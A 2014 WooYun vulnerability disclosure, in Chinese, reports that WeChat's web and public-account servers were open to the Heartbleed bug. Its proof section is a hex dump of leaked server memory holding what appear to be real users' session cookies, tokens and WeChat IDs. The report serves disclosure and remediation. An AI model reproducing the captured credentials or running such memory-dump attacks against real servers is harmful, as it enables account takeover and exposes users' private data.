微信网页版和公众账号版运维不当导致可随机登录微信用户并获取服务器敏感信息

漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

微信网页版和公众账号版运维不当导致可随机登录微信用户并获取服务器敏感信息
http://wx.qq.com
http://mp.weixin.qq.com

详细说明:

#1 漏洞描述 (CVE-2014-0160)

http://drops.wooyun.org/papers/1381

针对Openssl heartbeat漏洞的exp已经流出,经过测试可以dump出任何使用openssl库进程的内存数据,每次64kb,位置随机,但是由于exp起来十分容易速度很快并且可以多线程,一会就获得了几千个用户的cookie,随机抽取了几个发现可以任意登录。

#2 危害描述

该漏洞不但能获取cookie、源码、服务器配置,研究者声称他们能成功恢复SSL密钥

漏洞证明:

# 获取cookie

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3554
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 65 35 32 31 ....#.......e521
00e0: 39 32 32 32 36 34 36 37 33 33 34 34 26 73 79 6E 922264673344&syn
00f0: 63 6B 65 79 3D 31 5F 36 32 34 33 35 30 35 35 32 ckey=1_624350552
0100: 25 37 43 32 5F 36 32 34 33 35 31 31 31 34 25 37 %7C2_624351114%7
0110: 43 33 5F 36 32 34 33 35 31 30 39 32 25 37 43 31 C3_624351092%7C1
0120: 31 5F 36 32 34 33 35 30 30 32 30 25 37 43 32 30 1_624350020%7C20
0130: 31 5F 31 33 39 36 39 34 33 36 32 32 25 37 43 31 1_1396943622%7C1
0140: 30 30 30 5F 31 33 39 36 39 32 30 35 32 30 26 5F 000_1396920520&_
0150: 3D 31 33 39 36 39 34 34 34 32 37 39 35 34 20 48 =1396944427954 H
0160: 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 77 TTP/1.1..Host: w
0170: 65 62 70 75 73 68 2E 77 65 69 78 69 6E 2E 71 71 ebpush.weixin.qq
0180: 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E .com..Connection
0190: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 41 63 : keep-alive..Ac
01a0: 63 65 70 74 3A 20 2A 2F 2A 0D 0A 55 73 65 72 2D cept: */*..User-
01b0: 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 Agent: Mozilla/5
01c0: 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 35 .0 (Windows NT 5
01d0: 2E 31 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F .1) AppleWebKit/
01e0: 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 537.36 (KHTML, l
01f0: 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D ike Gecko) Chrom
0200: 65 2F 32 38 2E 30 2E 31 35 30 30 2E 39 35 20 53 e/28.0.1500.95 S
0210: 61 66 61 72 69 2F 35 33 37 2E 33 36 20 53 45 20 afari/537.36 SE
0220: 32 2E 58 20 4D 65 74 61 53 72 20 31 2E 30 0D 0A 2.X MetaSr 1.0..
0230: 52 65 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F Referer: https:/
0240: 2F 77 78 2E 71 71 2E 63 6F 6D 2F 3F 26 6C 61 6E /wx.qq.com/?&lan
0250: 67 3D 7A 68 5F 43 4E 0D 0A 41 63 63 65 70 74 2D g=zh_CN..Accept-
0260: 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 64 Encoding: gzip,d
0270: 65 66 6C 61 74 65 2C 73 64 63 68 0D 0A 41 63 63 eflate,sdch..Acc
0280: 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 ept-Language: zh
0290: 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F -CN,zh;q=0.8..Co
02a0: 6F 6B 69 65 3A 20 61 64 69 64 3D 39 31 30 39 31 okie: adid=91091
02b0: 31 38 35 31 3B 20 61 64 56 65 72 3D 32 38 38 31 1851; adVer=2881
02c0: 3B 20 61 63 3D 31 2C 30 32 30 2C 3B 20 70 67 76 ; ac=1,020,; pgv
02d0: 5F 72 5F 63 6F 6F 6B 69 65 3D 31 30 36 31 38 31 _r_cookie=106181
02e0: 35 36 32 39 39 37 38 3B 20 70 76 69 64 3D 39 37 5629978; pvid=97
02f0: 36 37 36 33 32 36 36 32 3B 20 41 52 45 41 43 4F 67632662; AREACO
0300: 44 45 3D 31 7C 31 32 7C 3B 20 50 43 43 4F 4F 4B DE=1|12|; PCCOOK
0310: 49 45 3D 35 63 35 30 35 36 31 39 30 36 30 35 33 IE=5c50561906053
0320: 64 65 35 36 38 61 37 35 66 37 61 33 61 37 61 62 de568a75f7a3a7ab
0330: 36 63 38 34 34 36 32 62 65 36 35 39 61 38 65 61 6c84462be659a8ea
0340: 64 64 34 31 30 33 62 64 61 36 62 61 36 35 35 61 dd4103bda6ba655a
0350: 36 39 35 3B 20 50 43 43 4F 4F 4B 49 45 32 3D 33 695; PCCOOKIE2=3
0360: 38 32 31 32 33 30 34 37 3B 20 6C 76 5F 69 72 74 82123047; lv_irt
0370: 5F 69 64 3D 37 35 63 65 63 30 33 39 38 35 36 35 _id=75cec0398565
0380: 65 30 37 34 36 38 63 30 31 35 66 39 31 39 38 65 e07468c015f9198e
0390: 33 61 37 36 3B 20 6F 5F 63 6F 6F 6B 69 65 3D 39 3a76; o_cookie=9
03a0: 31 30 39 31 31 38 35 31 3B 20 67 5F 70 76 69 64 10911851; g_pvid
03b0: 3D 31 33 39 35 35 33 32 36 39 37 30 30 30 3B 20 =1395532697000;
03c0: 71 6D 5F 75 73 65 72 6E 61 6D 65 3D 39 31 30 39 qm_username=9109
03d0: 31 31 38 35 31 3B 20 71 6D 5F 73 69 64 3D 63 37 11851; qm_sid=c7
03e0: 63 66 62 61 66 62 66 62 32 37 63 31 65 33 32 63 cfbafbfb27c1e32c
03f0: 38 34 32 37 36 31 33 32 30 39 30 39 61 39 2C 71 842761320909a9,q
0400: 53 30 64 4D 53 57 31 73 59 6A 52 58 62 69 70 4E S0dMSW1sYjRXbipN
0410: 5A 6D 68 68 4F 57 4E 7A 4D 57 74 36 59 6E 64 35 ZmhhOWNzMWt6Ynd5
0420: 65 58 4E 69 52 58 46 76 59 54 5A 73 57 47 6C 30 eXNiRXFvYTZsWGl0
0430: 62 6B 74 51 52 6E 52 6E 62 31 38 2E 3B 20 52 4B bktQRnRnb18.; RK
0440: 3D 52 37 30 6D 35 69 49 56 64 75 3B 20 70 74 69 =R70m5iIVdu; pti
0450: 73 70 3D 63 74 63 3B 20 70 74 63 7A 3D 65 35 33 sp=ctc; ptcz=e53
0460: 32 35 33 39 65 34 34 63 35 34 66 63 35 65 38 34 2539e44c54fc5e84
0470: 63 38 34 36 65 31 64 38 63 65 64 31 32 62 61 61 c846e1d8ced12baa
0480: 34 37 30 62 32 65 63 39 64 61 66 64 65 31 62 31 470b2ec9dafde1b1
0490: 65 63 35 63 32 31 64 33 39 62 64 38 37 3B 20 70 ec5c21d39bd87; p
04a0: 74 32 67 67 75 69 6E 3D 6F 30 39 31 30 39 31 31 t2gguin=o0910911
04b0: 38 35 31 3B 20 70 67 76 5F 69 6E 66 6F 3D 73 73 851; pgv_info=ss
04c0: 69 64 3D 73 32 30 32 39 36 35 30 35 35 33 3B 20 id=s2029650553;
04d0: 74 73 5F 72 65 66 65 72 3D 77 77 77 2E 73 6F 67 ts_refer=www.sog
04e0: 6F 75 2E 63 6F 6D 2F 73 6F 67 6F 75 3B 20 70 67 ou.com/sogou; pg
04f0: 76 5F 70 76 69 64 3D 35 38 38 31 37 32 35 32 36 v_pvid=588172526
0500: 3B 20 74 73 5F 75 69 64 3D 31 35 35 38 31 33 31 ; ts_uid=1558131
0510: 36 30 3B 20 75 69 6E 3D 3B 20 73 6B 65 79 3D 3B 60; uin=; skey=;
0520: 20 72 76 32 3D 38 30 39 41 35 33 34 41 45 41 37 rv2=809A534AEA7
0530: 45 38 43 33 30 33 37 38 32 37 39 45 30 35 37 34 E8C30378279E0574
0540: 30 45 44 39 38 41 39 30 44 43 39 33 42 45 44 44 0ED98A90DC93BEDD
0550: 38 39 42 38 41 44 35 3B 20 70 72 6F 70 65 72 74 89B8AD5; propert
0560: 79 32 30 3D 38 37 44 34 38 44 33 41 46 36 34 36 y20=87D48D3AF646
0570: 41 35 38 30 41 41 37 30 33 35 44 36 31 34 42 43 A580AA7035D614BC
0580: 43 46 39 39 37 41 42 44 39 30 44 45 38 33 36 44 CF997ABD90DE836D
0590: 35 30 44 36 41 46 46 43 31 33 32 32 39 38 34 46 50D6AFFC1322984F
05a0: 31 34 30 30 35 33 42 39 31 38 44 35 45 42 33 41 140053B918D5EB3A
05b0: 42 46 31 32 3B 20 77 65 62 77 78 75 76 69 64 3D BF12; webwxuvid=
05c0: 33 32 37 35 31 39 37 38 34 30 3B 20 6D 6D 5F 6C 3275197840; mm_l
05d0: 61 6E 67 3D 7A 68 5F 43 4E 3B 20 77 78 73 74 61 ang=zh_CN; wxsta
05e0: 79 74 69 6D 65 3D 31 33 39 36 39 34 33 35 31 37 ytime=1396943517
05f0: 3B 20 77 78 70 6C 75 67 69 6E 6B 65 79 3D 31 33 ; wxpluginkey=13
0600: 39 36 39 32 30 35 32 30 3B 20 77 78 75 69 6E 3D 96920520; wxuin=
0610: 31 34 30 39 37 31 38 31 38 31 3B 20 77 78 73 69 1409718181; wxsi
0620: 64 3D 54 31 75 4F 46 70 6B 2F 54 52 58 36 5A 34 d=T1uOFpk/TRX6Z4
0630: 76 75 0D 0A 0D 0A 67 7D C6 C8 EF A2 0C A3 32 C9 vu....g}......2.
0640: CD AB 8A 95 57 71 01 2D E3 A7 05 05 05 05 05 05 ....Wq.-........
0650: 2D 79 6F 22 2C 22 43 68 61 74 52 6F 6F 6D 49 64 -yo","ChatRoomId
0660: 22 3A 33 33 31 39 31 30 32 38 33 37 7D 2C 7B 22 ":3319102837},{"
0670: 55 73 65 72 4E 61 6D 65 22 3A 22 77 78 69 64 5F UserName":"wxid_
0680: 64 6A 6F 61 33 78 31 30 32 30 72 38 32 32 22 2C djoa3x1020r822",
0690: 22 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 "ChatRoomId":331
06a0: 39 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E 9102837},{"UserN
06b0: 61 6D 65 22 3A 22 77 78 69 64 5F 6D 36 68 35 67 ame":"wxid_m6h5g
06c0: 6F 6E 39 66 79 38 34 32 31 22 2C 22 43 68 61 74 on9fy8421","Chat
06d0: 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31 30 32 38 RoomId":33191028
06e0: 33 37 7D 2C 7B 22 55 73 65 72 4E 61 6D 65 22 3A 37},{"UserName":
06f0: 22 73 68 69 74 6F 75 35 30 37 30 38 32 22 2C 22 "shitou507082","
0700: 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39 ChatRoomId":3319
0710: 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E 61 102837},{"UserNa
0720: 6D 65 22 3A 22 72 75 6E 71 69 31 31 22 2C 22 43 me":"runqi11","C
0730: 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31 hatRoomId":33191
0740: 30 32 38 33 37 7D 5D 7D 75 5E 87 30 86 EF B4 88 02837}]}u^.0....
0750: C4 13 B3 66 1A F7 22 56 70 A2 4D 35 03 03 03 03 ...f.."Vp.M5....
0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

修复方案:

# 更新openssl到最新版或降级

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-08 16:09

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

2014-04-14:感谢您的反馈,该问题属于通用型漏洞,已有白帽子通过其它途径先于您报告,并已知会相关业务修复。再次感谢您的支持,如有疑问,欢迎反馈,我们将有专人跟进


漏洞评价: